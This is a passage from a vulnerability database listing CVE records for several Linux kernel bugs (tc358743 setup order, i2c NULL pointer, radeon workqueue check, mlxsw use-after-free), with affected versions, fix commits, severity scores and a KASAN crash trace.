"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.311",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.273",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.214",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.153",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.83",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.23",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.11",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.2",
"versionStartIncluding": "4.3",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.3",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmedia: tc358743: register v4l2 async device only after successful setup\n\nEnsure the device has been setup correctly before registering the v4l2\nasync device, thus allowing userspace to access."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:06:21.297Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/17c2650de14842c25c569cbb2126c421489a3a24"
},
{
"url": "https://git.kernel.org/stable/c/daf21394f9898fb9f0698c3e50de08132d2164e6"
},
{
"url": "https://git.kernel.org/stable/c/610f20e5cf35ca9c0992693cae0dd8643ce932e7"
},
{
"url": "https://git.kernel.org/stable/c/b8505a1aee8f1edc9d16d72ae09c93de086e2a1a"
},
{
"url": "https://git.kernel.org/stable/c/8ba8db9786b55047df5ad3db3e01dd886687a77d"
},
{
"url": "https://git.kernel.org/stable/c/edbb3226c985469a2f8eb69885055c9f5550f468"
},
{
"url": "https://git.kernel.org/stable/c/c915c46a25c3efb084c4f5e69a053d7f7a635496"
},
{
"url": "https://git.kernel.org/stable/c/4f1490a5d7a0472ee5d9f36547bc4ba46be755c7"
},
{
"url": "https://git.kernel.org/stable/c/87399f1ff92203d65f1febf5919429f4bb613a02"
}
],
"title": "media: tc358743: register v4l2 async device only after successful setup",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35830",
"datePublished": "2024-05-17T13:41:19.675Z",
"dateReserved": "2024-05-17T12:19:12.348Z",
"dateUpdated": "2025-05-04T09:06:21.297Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35984 (GCVE-0-2024-35984)
Vulnerability from cvelistv5
Published
2024-05-20 09:47
Modified
2025-05-04 09:09
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
i2c: smbus: fix NULL function pointer dereference
Baruch reported an OOPS when using the designware controller as target
only. Target-only modes break the assumption of one transfer function
always being available. Fix this by always checking the pointer in
__i2c_transfer.
[wsa: dropped the simplification in core-smbus to avoid theoretical regressions]
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 63453b59e41173241c4efe9335815f6432fa8586 Version: 63453b59e41173241c4efe9335815f6432fa8586 Version: 63453b59e41173241c4efe9335815f6432fa8586 Version: 63453b59e41173241c4efe9335815f6432fa8586 Version: 63453b59e41173241c4efe9335815f6432fa8586 Version: 63453b59e41173241c4efe9335815f6432fa8586 Version: 63453b59e41173241c4efe9335815f6432fa8586 Version: 63453b59e41173241c4efe9335815f6432fa8586 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-35984",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-21T15:11:46.719693Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:33:32.705Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T03:21:49.037Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/40f1d79f07b49c8a64a861706e5163f2db4bd95d"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ad3c3ac7a03be3697114f781193dd3e9d97e6e23"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5fd72404587d7db4acb2d241fd8c387afb0a7aec"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5a09eae9a7db597fe0c1fc91636205b4a25d2620"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/4e75e222d397c6752b229ed72fc4644c8c36ecde"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e3425674ff68dc521c57c6eabad0cbd20a027d85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/357c64ef1ef39b1e7cd91ab6bdd304d043702c83"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/91811a31b68d3765b3065f4bb6d7d6d84a7cfc9f"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/i2c/i2c-core-base.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "40f1d79f07b49c8a64a861706e5163f2db4bd95d",
"status": "affected",
"version": "63453b59e41173241c4efe9335815f6432fa8586",
"versionType": "git"
},
{
"lessThan": "ad3c3ac7a03be3697114f781193dd3e9d97e6e23",
"status": "affected",
"version": "63453b59e41173241c4efe9335815f6432fa8586",
"versionType": "git"
},
{
"lessThan": "5fd72404587d7db4acb2d241fd8c387afb0a7aec",
"status": "affected",
"version": "63453b59e41173241c4efe9335815f6432fa8586",
"versionType": "git"
},
{
"lessThan": "5a09eae9a7db597fe0c1fc91636205b4a25d2620",
"status": "affected",
"version": "63453b59e41173241c4efe9335815f6432fa8586",
"versionType": "git"
},
{
"lessThan": "4e75e222d397c6752b229ed72fc4644c8c36ecde",
"status": "affected",
"version": "63453b59e41173241c4efe9335815f6432fa8586",
"versionType": "git"
},
{
"lessThan": "e3425674ff68dc521c57c6eabad0cbd20a027d85",
"status": "affected",
"version": "63453b59e41173241c4efe9335815f6432fa8586",
"versionType": "git"
},
{
"lessThan": "357c64ef1ef39b1e7cd91ab6bdd304d043702c83",
"status": "affected",
"version": "63453b59e41173241c4efe9335815f6432fa8586",
"versionType": "git"
},
{
"lessThan": "91811a31b68d3765b3065f4bb6d7d6d84a7cfc9f",
"status": "affected",
"version": "63453b59e41173241c4efe9335815f6432fa8586",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/i2c/i2c-core-base.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "4.19"
},
{
"lessThan": "4.19",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.313",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.275",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.216",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.158",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.90",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.30",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.8.*",
"status": "unaffected",
"version": "6.8.9",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.9",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.313",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.275",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.216",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.158",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.90",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.30",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8.9",
"versionStartIncluding": "4.19",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.9",
"versionStartIncluding": "4.19",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ni2c: smbus: fix NULL function pointer dereference\n\nBaruch reported an OOPS when using the designware controller as target\nonly. Target-only modes break the assumption of one transfer function\nalways being available. Fix this by always checking the pointer in\n__i2c_transfer.\n\n[wsa: dropped the simplification in core-smbus to avoid theoretical regressions]"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T09:09:50.767Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/40f1d79f07b49c8a64a861706e5163f2db4bd95d"
},
{
"url": "https://git.kernel.org/stable/c/ad3c3ac7a03be3697114f781193dd3e9d97e6e23"
},
{
"url": "https://git.kernel.org/stable/c/5fd72404587d7db4acb2d241fd8c387afb0a7aec"
},
{
"url": "https://git.kernel.org/stable/c/5a09eae9a7db597fe0c1fc91636205b4a25d2620"
},
{
"url": "https://git.kernel.org/stable/c/4e75e222d397c6752b229ed72fc4644c8c36ecde"
},
{
"url": "https://git.kernel.org/stable/c/e3425674ff68dc521c57c6eabad0cbd20a027d85"
},
{
"url": "https://git.kernel.org/stable/c/357c64ef1ef39b1e7cd91ab6bdd304d043702c83"
},
{
"url": "https://git.kernel.org/stable/c/91811a31b68d3765b3065f4bb6d7d6d84a7cfc9f"
}
],
"title": "i2c: smbus: fix NULL function pointer dereference",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-35984",
"datePublished": "2024-05-20T09:47:51.738Z",
"dateReserved": "2024-05-17T13:50:33.145Z",
"dateUpdated": "2025-05-04T09:09:50.767Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52470 (GCVE-0-2023-52470)
Vulnerability from cvelistv5
Published
2024-02-25 08:16
Modified
2025-05-04 07:37
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
drm/radeon: check the alloc_workqueue return value in radeon_crtc_init()
check the alloc_workqueue return value in radeon_crtc_init()
to avoid null-ptr-deref.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337 Version: fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337 Version: fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337 Version: fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337 Version: fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337 Version: fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337 Version: fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337 Version: fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T23:03:19.642Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/21b1645660717d6126dd4866c850fcc5c4703a41"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/5d12c5d75f7c78b83a738025947651ec5c95b4d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/57ca7984806d79b38af528de88fd803babf27feb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/14bbfaa5df273b26cde6707f6e655585700e6fe1"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c4ff55408187f2595066967047363ca84e76db85"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/0b813a6a0087451cb702b6eb841f10856f49d088"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/fb2d8bc9b5e55848b8a7c3c028e2ee8d49f28f97"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/7a2464fac80d42f6f8819fed97a553e9c2f43310"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00016.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-52470",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T16:02:26.709108Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:45.635Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/radeon/radeon_display.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "21b1645660717d6126dd4866c850fcc5c4703a41",
"status": "affected",
"version": "fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337",
"versionType": "git"
},
{
"lessThan": "5d12c5d75f7c78b83a738025947651ec5c95b4d4",
"status": "affected",
"version": "fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337",
"versionType": "git"
},
{
"lessThan": "57ca7984806d79b38af528de88fd803babf27feb",
"status": "affected",
"version": "fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337",
"versionType": "git"
},
{
"lessThan": "14bbfaa5df273b26cde6707f6e655585700e6fe1",
"status": "affected",
"version": "fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337",
"versionType": "git"
},
{
"lessThan": "c4ff55408187f2595066967047363ca84e76db85",
"status": "affected",
"version": "fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337",
"versionType": "git"
},
{
"lessThan": "0b813a6a0087451cb702b6eb841f10856f49d088",
"status": "affected",
"version": "fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337",
"versionType": "git"
},
{
"lessThan": "fb2d8bc9b5e55848b8a7c3c028e2ee8d49f28f97",
"status": "affected",
"version": "fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337",
"versionType": "git"
},
{
"lessThan": "7a2464fac80d42f6f8819fed97a553e9c2f43310",
"status": "affected",
"version": "fa7f517cb26eb1a1a1f0baffcced39f6c3ec3337",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/gpu/drm/radeon/radeon_display.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.16"
},
{
"lessThan": "3.16",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.306",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.268",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.209",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.148",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.75",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.14",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.2",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.306",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.268",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.209",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.148",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.75",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.14",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.2",
"versionStartIncluding": "3.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.16",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/radeon: check the alloc_workqueue return value in radeon_crtc_init()\n\ncheck the alloc_workqueue return value in radeon_crtc_init()\nto avoid null-ptr-deref."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:37:22.890Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/21b1645660717d6126dd4866c850fcc5c4703a41"
},
{
"url": "https://git.kernel.org/stable/c/5d12c5d75f7c78b83a738025947651ec5c95b4d4"
},
{
"url": "https://git.kernel.org/stable/c/57ca7984806d79b38af528de88fd803babf27feb"
},
{
"url": "https://git.kernel.org/stable/c/14bbfaa5df273b26cde6707f6e655585700e6fe1"
},
{
"url": "https://git.kernel.org/stable/c/c4ff55408187f2595066967047363ca84e76db85"
},
{
"url": "https://git.kernel.org/stable/c/0b813a6a0087451cb702b6eb841f10856f49d088"
},
{
"url": "https://git.kernel.org/stable/c/fb2d8bc9b5e55848b8a7c3c028e2ee8d49f28f97"
},
{
"url": "https://git.kernel.org/stable/c/7a2464fac80d42f6f8819fed97a553e9c2f43310"
}
],
"title": "drm/radeon: check the alloc_workqueue return value in radeon_crtc_init()",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52470",
"datePublished": "2024-02-25T08:16:33.636Z",
"dateReserved": "2024-02-20T12:30:33.297Z",
"dateUpdated": "2025-05-04T07:37:22.890Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-35854 (GCVE-0-2024-35854)
Vulnerability from cvelistv5
Published
2024-05-17 14:47
Modified
2025-05-04 09:06
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
mlxsw: spectrum_acl_tcam: Fix possible use-after-free during rehash
The rehash delayed work migrates filters from one region to another
according to the number of available credits.
The migrated from region is destroyed at the end of the work if the
number of credits is non-negative as the assumption is that this is
indicative of migration being complete. This assumption is incorrect as
a non-negative number of credits can also be the result of a failed
migration.
The destruction of a region that still has filters referencing it can
result in a use-after-free [1].
Fix by not destroying the region if migration failed.
[1]
BUG: KASAN: slab-use-after-free in mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230
Read of size 8 at addr ffff8881735319e8 by task kworker/0:31/3858
CPU: 0 PID: 3858 Comm: kworker/0:31 Tainted: G W 6.9.0-rc2-custom-00782-gf2275c2157d8 #5
Hardware name: Mellanox Technologies Ltd. MSN3700/VMOD0005, BIOS 5.11 01/06/2019
Workqueue: mlxsw_core mlxsw_sp_acl_tcam_vregion_rehash_work
Call Trace:
<TASK>
dump_stack_lvl+0xc6/0x120
print_report+0xce/0x670
kasan_report+0xd7/0x110
mlxsw_sp_acl_ctcam_region_entry_remove+0x21d/0x230
mlxsw_sp_acl_ctcam_entry_del+0x2e/0x70
mlxsw_sp_acl_atcam_entry_del+0x81/0x210
mlxsw_sp_acl_tcam_vchunk_migrate_all+0x3cd/0xb50
mlxsw_sp_acl_tcam_vregion_rehash_work+0x157/0x1300
process_one_work+0x8eb/0x19b0
worker_thread+0x6c9/0xf70
kthread+0x2c9/0x3b0
ret_from_fork+0x4d/0x80
ret_from_fork_asm+0x1a/0x30
</TASK>
Allocated by task 174:
kasan_save_stack+0x33/0x60
kasan_save_track+0x14/0x30
__kasan_kmalloc+0x8f/0xa0
__kmalloc+0x19c/0x360
mlxsw_sp_acl_tcam_region_create+0xdf/0x9c0
mlxsw_sp_acl_tcam_vregion_rehash_work+0x954/0x1300
process_one_work+0x8eb/0x19b0
worker_thread+0x6c9/0xf70
kthread+0x2c9/0x3b0
ret_from_fork+0x4d/0x80
ret_from_fork_asm+0x1a/0x30
Freed by task 7:
kasan_save_stack+0x33/0x60
kasan_save_track+0x14/0x30
kasan_save_free_info+0x3b/0x60
poison_slab_object+0x102/0x170
__kasan_slab_free+0x14/0x30
kfree+0xc1/0x290
mlxsw_sp_acl_tcam_region_destroy+0x272/0x310
mlxsw_sp_acl_tcam_vregion_rehash_work+0x731/0x1300
process_one_work+0x8eb/0x19b0
worker_thread+0x6c9/0xf70
kthread+0x2c9/0x3b0
ret_from_fork+0x4d/0x80
ret_from_fork_asm+0x1a/0x30
References
| URL | Tags | ||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 Version: c9c9af91f1d9a636aecc55302c792538e549a430 |
||
{
"containers": {
"adp": [
{
"affected": [
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "c9c9af91f1d9"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "affected",
"version": "5.1"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "0"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.4.275"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.10.216"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "5.15.158"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.1.90"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.6.30"
}
]
},
{
"cpes": [
"cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.8.9"
}
]
},
{
"cpes": [
"cpe:2.3:a:linux:linux_kernel:-:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "linux_kernel",
"vendor": "linux",
"versions": [
{
"status": "unaffected",
"version": "6.9"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-35854",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-05-17T16:58:28.959142Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "CWE-416 Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-01-16T21:17:40.149Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
